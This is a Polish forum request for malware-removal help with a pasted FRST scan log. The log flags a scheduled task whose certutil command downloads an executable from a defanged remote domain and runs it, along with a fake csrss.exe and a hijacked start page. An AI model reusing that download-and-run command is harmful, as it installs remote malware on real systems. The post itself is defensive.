Zainstalowałem program który zawirusował mi komputer wyskakiwały reklamy cały czas w przeglądarce Mozilla zrobiłem scan Combofix i Dr. Web Cureit i problem zniknął. Malwarebytes Anti-Malware nie chce mi zainstalować. Reklam już nie ma ale jest jeszcze w panelu sterowania program Safe Finder.
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 12-08-2020
Uruchomiony przez CZARNY (administrator) CZARNYPS2 (Gigabyte Technology Co., Ltd. GA-970A-UD3) (15-08-2020 14:20:39)
Uruchomiony z C:\Users\CZARNY\Downloads
Załadowane profile: CZARNY
Platform: Windows 7 Ultimate Service Pack 1 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: FF)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Procesy (filtrowane) =================
(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)
(Microsoft Corporation - & gt; Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation - & gt; Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Mozilla Corporation - & gt; Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe & lt; 7 & gt;
(NVIDIA Corporation - & gt; NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe & lt; 2 & gt;
==================== Rejestr (filtrowane) ===================
(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)
HKU\S-1-5-21-354322530-2003416295-1296916781-1000\...\Run: [Napisy24.pl] = & gt; C:\Program Files (x86)\Napisy24\Napisy24.exe [7492840 2019-06-19] (ALLPlayer Group sp. z o.o. - & gt; Napisy24.pl)
HKU\S-1-5-21-354322530-2003416295-1296916781-1000\...\Run: [MistyFrost] = & gt; C:\Windows\rss\csrss.exe [4071936 2020-08-11] () [Brak podpisu cyfrowego] & lt; ==== UWAGA
HKU\S-1-5-21-354322530-2003416295-1296916781-1000\...\Run: [CloudNet] = & gt; C:\Users\CZARNY\AppData\Roaming\10c7395ad741\10c7395ad741.exe [549376 2020-08-13] () [Brak podpisu cyfrowego] & lt; ==== UWAGA
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] - & gt; C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.163\Installer\chrmstp.exe [2020-04-06] (Google LLC - & gt; Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] - & gt; c:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
==================== Zaplanowane zadania (filtrowane) ============
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
Task: {2EE9C200-FA62-4585-89B3-9C1B73E58E16} - System32\Tasks\GoogleUpdateTaskMachineCore = & gt; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-02-27] (Google LLC - & gt; Google LLC)
Task: {2FA212EF-EC73-4CD9-A5D2-AE6BF488F23A} - System32\Tasks\GoogleUpdateTaskMachineUA = & gt; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-02-27] (Google LLC - & gt; Google LLC)
Task: {31F9CA68-6325-412D-B2BA-FAC105E7D1C8} - System32\Tasks\ScheduledUpdate = & gt; cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\CZARNY\AppData\Local\Temp\csrss\scheduled.exe & & C:\Users\CZARNY\AppData\Local\Temp\csrss\scheduled.exe /31340 & lt; ==== UWAGA
Task: {4249D961-FB60-466F-BD64-03FDC54E6E99} - \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - & gt; Brak pliku & lt; ==== UWAGA
Task: {69971877-2EC2-4661-8F11-5D6AD7D1DE41} - System32\Tasks\Adobe Flash Player Updater = & gt; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-02-11] (Adobe Inc. - & gt; Adobe)
Task: {77D43F1F-31B5-4089-9FDB-87B3E9C7B99D} - Brak ścieżki do pliku
Task: {8194D37A-7EAE-4319-A51B-6258800D37EA} - System32\Tasks\Adobe Flash Player NPAPI Notifier = & gt; C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_330_Plugin.exe [1458232 2020-02-11] (Adobe Inc. - & gt; Adobe)
Task: {C9018C52-0961-4A31-8A5D-32909033A9FF} - System32\Tasks\csrss = & gt; C:\Windows\rss\csrss.exe [4071936 2020-08-11] () [Brak podpisu cyfrowego] & lt; ==== UWAGA
(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)
==================== Internet (filtrowane) ====================
(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)
Winsock: Catalog5 07 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
Winsock: Catalog5-x64 07 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 87.204.204.204 62.233.233.233
Tcpip\..\Interfaces\{3C69907C-D88F-4F72-8BEE-B299AEB4E87F}: [DhcpNameServer] 87.204.204.204 62.233.233.233
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie & ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie & ar=msnhome
HKU\S-1-5-21-354322530-2003416295-1296916781-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie & ar=iesearch
HKU\S-1-5-21-354322530-2003416295-1296916781-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxldvM_sEGJZAe-C_Sw6pUA3EE-petbyOgNvX4APSB9cD6LDspSm4hRu_5k6CHlaCmeiRknXIqQB8sLEgibygWRnhqXMv78I9dbA_u2qa_X8cyAVLn8ZiF86MeucBj67k0HGwSoXcclDi9WppMIpeKbBbnnCwFDV0gS287QkzOw,,
SearchScopes: HKLM-x32 - & gt; DefaultScope - brak wartości
BHO: Java(tm) Plug-In SSV Helper - & gt; {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - & gt; C:\Program Files\Java\jre1.8.0_102\bin\ssv.dll [2019-10-17] (Oracle America, Inc. - & gt; Oracle Corporation)
BHO: Windows Live ID Sign-in Helper - & gt; {9030D464-4C02-4ABF-8ECC-5164760863C6} - & gt; c:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper - & gt; {DBC80044-A445-435b-BC74-9C25C1C588A9} - & gt; C:\Program Files\Java\jre1.8.0_102\bin\jp2ssv.dll [2019-10-17] (Oracle America, Inc. - & gt; Oracle Corporation)
BHO-x32: BitComet Helper - & gt; {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} - & gt; C:\Program Files\BitComet\tools\BitCometBHO_1.5.4.11.dll [2013-11-29] (Shanghai Comet Network Technology - & gt; BitComet)
BHO-x32: Java(tm) Plug-In SSV Helper - & gt; {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - & gt; C:\Program Files (x86)\Java\jre1.8.0_102\bin\ssv.dll [2019-10-17] (Oracle America, Inc. - & gt; Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper - & gt; {9030D464-4C02-4ABF-8ECC-5164760863C6} - & gt; c:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - & gt; {DBC80044-A445-435b-BC74-9C25C1C588A9} - & gt; C:\Program Files (x86)\Java\jre1.8.0_102\bin\jp2ssv.dll [2019-10-17] (Oracle America, Inc. - & gt; Oracle Corporation)
FireFox:
========
FF DefaultProfile: pa6scssl.default
FF ProfilePath: C:\Users\CZARNY\AppData\Roaming\Mozilla\Firefox\Profiles\pa6scssl.default [2020-08-11]
FF ProfilePath: C:\Users\CZARNY\AppData\Roaming\Mozilla\Firefox\Profiles\3984h8co.default-release-1588776259085 [2020-08-15]
FF Plugin-x32: @adobe.com/FlashPlayer - & gt; C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_330.dll [2020-02-11] (Adobe Inc. - & gt; )
FF Plugin-x32: @adobe.com/ShockwavePlayer - & gt; C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2016-09-20] (Adobe Systems, Inc.) [Brak podpisu cyfrowego]
FF Plugin-x32: @java.com/DTPlugin,version=11.102.2 - & gt; C:\Program Files (x86)\Java\jre1.8.0_102\bin\dtplugin\npDeployJava1.dll [2019-10-17] (Oracle America, Inc. - & gt; Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.102.2 - & gt; C:\Program Files (x86)\Java\jre1.8.0_102\bin\plugin2\npjp2.dll [2019-10-17] (Oracle America, Inc. - & gt; Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - & gt; disabled [Brak pliku]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - & gt; c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation - & gt; Microsoft Corporation)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default [2020-08-15]
CHR Extension: (Prezentacje) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-02-27]
CHR Extension: (Dokumenty) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-02-27]
CHR Extension: (Dysk Google) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-02-27]
CHR Extension: (YouTube) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-02-27]
CHR Extension: (d8yI+Hf7rX) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\dmdkkafadjnmdiemakiemlkkckkdjnbd [2020-08-11]
CHR Extension: (Arkusze) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-02-27]
CHR Extension: (Dokumenty Google offline) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-08-11]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-02-27]
CHR Extension: (Gmail) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-02-27]
CHR Extension: (Chrome Media Router) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-03]
CHR Profile: C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-08-11]
CHR Extension: (d8yI+Hf7rX) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\dmdkkafadjnmdiemakiemlkkckkdjnbd [2020-08-11]
CHR Profile: C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\System Profile [2020-08-11]
CHR Extension: (d8yI+Hf7rX) - C:\Users\CZARNY\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\dmdkkafadjnmdiemakiemlkkckkdjnbd [2020-08-11]
==================== Usługi (filtrowane) ===================
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
" MBAMInstallerService " = & gt; serwis nie został odblokowany. & lt; ==== UWAGA
HKLM\SYSTEM\ControlSet004\Services\MBAMInstallerService = & gt; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [6316568 2020-08-15] (Malwarebytes Inc - & gt; Malwarebytes) & lt; ==== UWAGA (Rootkit!/Zablokowana usługa)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-02-11] (Adobe Inc. - & gt; Adobe)
S3 BITCOMET_HELPER_SERVICE; C:\Program Files\BitComet\tools\BitCometService.exe [1296728 2013-11-29] (Shanghai Comet Network Technology - & gt; www.BitComet.com)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [Brak podpisu cyfrowego]
S3 WdiServiceHost; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Windows - & gt; Microsoft Corporation) & lt; ==== UWAGA (Brak ServiceDLL)
S3 WdiServiceHost; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Windows - & gt; Microsoft Corporation) & lt; ==== UWAGA (Brak ServiceDLL)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows - & gt; Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () & lt; ==== UWAGA (zerobajtowy plik/folder)
R2 wlidsvc; c:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2291568 2009-08-18] (Microsoft Corporation - & gt; Microsoft Corporation)
S3 odserv; " C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE " [X]
===================== Sterowniki (filtrowane) ===================
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
R1 10C7395AD741; C:\Windows\10C7395AD741.sys [25368 2020-08-11] (大连纵梦网络科技有限公司 - & gt; FsFilter Network) [Brak podpisu cyfrowego]
U5 cdrom; C:\Windows\System32\Drivers\cdrom.sys [147456 2010-11-20] (Microsoft Windows - & gt; Microsoft Corporation)
U5 EtronHub3; C:\Windows\System32\Drivers\EtronHub3.sys [56960 2011-07-29] (Microsoft Windows Hardware Compatibility Publisher - & gt; Etron Technology Inc)
R3 EtronXHCI; C:\Windows\System32\Drivers\EtronXHCI.sys [79104 2011-07-29] (Microsoft Windows Hardware Compatibility Publisher - & gt; Etron Technology Inc)
R1 SCDEmu; C:\Windows\System32\Drivers\SCDEmu.sys [93240 2011-06-15] (Zhenping Sun - & gt; PowerISO Computing, Inc.)
U5 Wanarpv6; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2018-12-08] (Microsoft Windows - & gt; Microsoft Corporation)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (NGO - & gt; MBB)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () & lt; ==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) & lt; ==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-08-13] (WDKTestCert Admin,131666266076831434 - & gt; ) [Brak podpisu cyfrowego]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 gdrv; \??\C:\Windows\gdrv.sys [X]
S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]
S4 nvvhci; system32\DRIVERS\nvvhci.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
==================== NetSvcs (filtrowane) ===================
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
==================== Jeden miesiąc (utworzone) ===================
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
2020-08-15 14:20 - 2020-08-15 14:21 - 000014881 _____ C:\Users\CZARNY\Downloads\FRST.txt
2020-08-15 14:20 - 2020-08-15 14:20 - 002296320 _____ (Farbar) C:\Users\CZARNY\Downloads\FRST64.exe
2020-08-13 10:21 - 2020-08-15 14:12 - 000003500 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-08-13 10:21 - 2020-08-15 14:12 - 000003184 _____ C:\Windows\system32\Tasks\csrss
2020-08-13 10:21 - 2020-08-13 10:21 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-08-13 09:48 - 2020-08-13 11:53 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\10c7395ad741
2020-08-13 09:39 - 2020-08-13 10:16 - 000000000 ____D C:\Users\CZARNY\Doctor Web
2020-08-13 09:39 - 2020-08-13 09:51 - 000000000 ____D C:\ProgramData\Doctor Web
2020-08-13 09:35 - 2020-08-13 09:35 - 000017981 _____ C:\ComboFix.txt
2020-08-13 09:16 - 2020-08-13 09:35 - 000000000 ____D C:\Qoobox
2020-08-13 09:16 - 2020-08-13 09:33 - 000000000 ____D C:\Windows\erdnt
2020-08-13 09:16 - 2011-06-26 08:45 - 000256000 _____ C:\Windows\PEV.exe
2020-08-13 09:16 - 2010-11-07 19:20 - 000208896 _____ C:\Windows\MBR.exe
2020-08-13 09:16 - 2009-04-20 06:56 - 000060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2020-08-13 09:16 - 2000-08-31 02:00 - 000518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2020-08-13 09:16 - 2000-08-31 02:00 - 000406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2020-08-13 09:16 - 2000-08-31 02:00 - 000098816 _____ C:\Windows\sed.exe
2020-08-13 09:16 - 2000-08-31 02:00 - 000080412 _____ C:\Windows\grep.exe
2020-08-13 09:16 - 2000-08-31 02:00 - 000068096 _____ C:\Windows\zip.exe
2020-08-13 09:03 - 2020-08-13 10:16 - 000000000 ____D C:\Program Files\XNLIXWNNGR
2020-08-13 09:03 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\5fdyb30c3tv
2020-08-13 09:03 - 2020-08-13 09:03 - 000000000 ____D C:\ProgramData\LINPJMJHJIYB4WZLPTRABFQA4
2020-08-13 08:57 - 2020-08-13 08:57 - 005659583 ____R (Swearware) C:\Users\CZARNY\Downloads\ComboFix.exe
2020-08-13 08:43 - 2020-08-13 10:16 - 000000000 ____D C:\Program Files\CSS9FJM3ND
2020-08-13 08:43 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\m4h1bnehuz3
2020-08-13 08:43 - 2020-08-13 08:43 - 000000000 ____D C:\ProgramData\GEPW5P4A8H7CH63NKNJBWT4JN
2020-08-13 08:41 - 2020-08-13 10:17 - 000000000 ____D C:\Program Files\1FA5AX9V0V
2020-08-13 08:41 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\ml5tevwipbj
2020-08-13 08:41 - 2020-08-13 08:41 - 000000000 ____D C:\ProgramData\O8AJ3IP5H1H1IDKX0KH3H5ZZ4
2020-08-11 12:59 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\wunfucczois
2020-08-11 12:59 - 2020-08-11 12:59 - 000000000 ____D C:\ProgramData\8KQ0GNV1F6W67RTW24UWNEQ2Y
2020-08-11 12:59 - 2020-08-11 12:59 - 000000000 ____D C:\Program Files\P0SB7W0205
2020-08-11 12:16 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\xn4yq0krban
2020-08-11 12:16 - 2020-08-13 09:22 - 000000000 ____D C:\Program Files\MV8J9X1BEM
2020-08-11 12:16 - 2020-08-11 12:17 - 000000000 ____D C:\ProgramData\M51G869WMDCSFI1C4WTWZAAEP
2020-08-11 12:11 - 2020-08-11 12:11 - 000011856 _____ C:\Users\CZARNY\AppData\Local\InstallationConfiguration.xml
2020-08-11 12:08 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\yumoyuzcsx4
2020-08-11 12:08 - 2020-08-13 09:22 - 000000000 ____D C:\Program Files\VDGC105998
2020-08-11 12:08 - 2020-08-11 12:09 - 000000000 ____D C:\ProgramData\453H2SZGWVJFMYKB9S30D2XPX
2020-08-11 12:04 - 2020-08-15 14:12 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-08-11 12:04 - 2020-08-11 12:04 - 000000000 ____D C:\Program Files\Malwarebytes
2020-08-11 11:53 - 2020-08-15 14:20 - 000000000 ____D C:\FRST
2020-08-11 11:48 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\nqqhjjuq13b
2020-08-11 11:48 - 2020-08-13 09:22 - 000000000 ____D C:\Program Files\ZZXJ4CCIAQ
2020-08-11 11:48 - 2020-08-11 11:49 - 000000000 ____D C:\ProgramData\N6MBPPRKMVGJSIX07F4TTP4PI
2020-08-11 11:48 - 2020-08-11 11:48 - 000000000 ____D C:\Program Files (x86)\wotsuper
2020-08-11 11:48 - 2020-08-11 11:48 - 000000000 ____D C:\Program Files (x86)\Seed Trade
2020-08-11 11:46 - 2020-08-11 11:47 - 000000000 ____D C:\AdwCleaner
2020-08-11 11:33 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\fk1dyzxifbg
2020-08-11 11:33 - 2020-08-13 09:22 - 000000000 ____D C:\Program Files\HP7HB9Q1VW
2020-08-11 11:33 - 2020-08-11 11:34 - 000000000 ____D C:\ProgramData\TDBHMAE2BO7XZHX3QPT39XOMB
2020-08-11 11:05 - 2020-08-11 11:05 - 005554104 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-08-11 11:05 - 2020-08-11 11:05 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-08-11 11:05 - 2020-08-11 11:05 - 000000000 ____D C:\Users\CZARNY\AppData\Local\app
2020-08-11 11:04 - 2020-08-13 10:17 - 000000000 ____D C:\Program Files\ARYJNSGR4K
2020-08-11 11:04 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\cqy52g3u45l
2020-08-11 11:04 - 2020-08-11 11:06 - 000000000 ____D C:\ProgramData\FAHA7TZQA47CKKLIUGU5TZQFF
2020-08-11 11:04 - 2020-08-11 11:04 - 008614400 _____ C:\Users\CZARNY\AppData\Local\agent.dat
2020-08-11 11:04 - 2020-08-11 11:04 - 002174106 _____ C:\Users\CZARNY\AppData\Local\Sansoft.tst
2020-08-11 11:04 - 2020-08-11 11:04 - 000126464 _____ C:\Users\CZARNY\AppData\Local\noah.dat
2020-08-11 11:04 - 2020-08-11 11:04 - 000071712 _____ C:\Users\CZARNY\AppData\Local\Config.xml
2020-08-11 11:04 - 2020-08-11 11:04 - 000067938 _____ C:\Users\CZARNY\AppData\Local\UniLathome.tst
2020-08-11 11:03 - 2020-08-13 09:23 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\1tppoihrhld
2020-08-11 11:03 - 2020-08-13 09:22 - 000000000 ____D C:\Program Files\I37V9SCD4K
2020-08-11 11:03 - 2020-08-11 11:04 - 000126464 _____ C:\Users\CZARNY\AppData\Local\lobby.dat
2020-08-11 11:03 - 2020-08-11 11:04 - 000043520 _____ C:\Users\CZARNY\AppData\Local\ApplicationHosting.dat
2020-08-11 11:03 - 2020-08-11 11:04 - 000005568 _____ C:\Users\CZARNY\AppData\Local\md.xml
2020-08-11 11:03 - 2020-08-11 11:03 - 000141312 _____ C:\Users\CZARNY\AppData\Local\installer.dat
2020-08-11 11:03 - 2020-08-11 11:03 - 000067938 _____ C:\Users\CZARNY\AppData\Local\LexiFresh.tst
2020-08-11 11:03 - 2020-08-11 11:03 - 000025368 _____ (FsFilter Network) C:\Windows\10C7395AD741.sys
2020-08-11 11:03 - 2020-08-11 11:03 - 000000000 ____D C:\ProgramData\7TLS7O9QMPEOKGRMSTGWULLYU
2020-08-11 11:03 - 2020-08-11 11:03 - 000000000 ____D C:\Program Files (x86)\azew
2020-08-09 18:11 - 2020-08-09 18:11 - 014921081 _____ C:\Users\CZARNY\Desktop\729403.pdf
2020-08-03 17:59 - 2020-08-03 17:59 - 000355336 _____ C:\Windows\Minidump\080320-10389-01.dmp
2020-07-31 19:19 - 2020-07-31 19:19 - 000407864 _____ C:\Windows\Minidump\073120-9968-01.dmp
2020-07-30 18:36 - 2020-07-30 18:36 - 000407792 _____ C:\Windows\Minidump\073020-10155-01.dmp
2020-07-29 10:16 - 2020-07-29 19:46 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-07-24 18:18 - 2020-07-24 18:18 - 000000000 ____D C:\Users\CZARNY\AppData\Local\BANDAI NAMCO Entertainment
2020-07-24 18:12 - 2020-07-26 17:20 - 000001039 _____ C:\Users\CZARNY\Desktop\One Piece World Seeker.lnk
2020-07-24 17:43 - 2020-07-24 18:15 - 000000000 ____D C:\Program Files\One Piece World Seeker
2020-07-23 17:40 - 2020-07-23 17:40 - 000407800 _____ C:\Windows\Minidump\072320-9828-01.dmp
2020-07-21 01:34 - 2020-07-21 01:34 - 000355728 _____ C:\Windows\Minidump\072120-9562-01.dmp
2020-07-18 14:43 - 2020-07-18 14:43 - 000407760 _____ C:\Windows\Minidump\071820-10920-01.dmp
==================== Jeden miesiąc (zmodyfikowane) ==================
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
2020-08-15 14:19 - 2009-07-14 06:45 - 000020816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-08-15 14:19 - 2009-07-14 06:45 - 000020816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-08-15 14:13 - 2019-06-07 19:54 - 000000000 ____D C:\Users\CZARNY\AppData\LocalLow\Mozilla
2020-08-15 14:12 - 2019-06-07 19:32 - 000000000 ____D C:\ProgramData\NVIDIA
2020-08-15 14:12 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-08-13 12:26 - 2019-09-05 15:37 - 000000000 ____D C:\Users\CZARNY\AppData\Local\Google
2020-08-13 11:53 - 2019-06-08 15:23 - 000000000 ____D C:\Users\CZARNY\AppData\Local\CrashDumps
2020-08-13 10:21 - 2019-06-07 19:23 - 000000000 ____D C:\Users\CZARNY
2020-08-13 10:18 - 2019-11-10 18:30 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\NVIDIA
2020-08-13 09:29 - 2009-07-14 04:34 - 000000215 _____ C:\Windows\system.ini
2020-08-13 09:28 - 2009-07-14 04:34 - 089915392 _____ C:\Windows\system32\config\software.bak
2020-08-13 09:28 - 2009-07-14 04:34 - 026214400 _____ C:\Windows\system32\config\system.bak
2020-08-13 09:28 - 2009-07-14 04:34 - 001835008 _____ C:\Windows\system32\config\default.bak
2020-08-13 09:28 - 2009-07-14 04:34 - 000262144 _____ C:\Windows\system32\config\security.bak
2020-08-13 09:28 - 2009-07-14 04:34 - 000262144 _____ C:\Windows\system32\config\sam.bak
2020-08-11 12:31 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\registration
2020-08-11 12:31 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2020-08-11 11:47 - 2020-02-27 16:25 - 000002242 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-08-11 11:47 - 2020-02-27 16:25 - 000002201 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-08-11 11:47 - 2020-02-27 16:25 - 000002201 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-08-11 11:47 - 2019-06-07 19:23 - 000001433 _____ C:\Users\CZARNY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2020-08-11 11:12 - 2019-06-22 19:30 - 000000000 ____D C:\Users\CZARNY\AppData\Roaming\BitComet
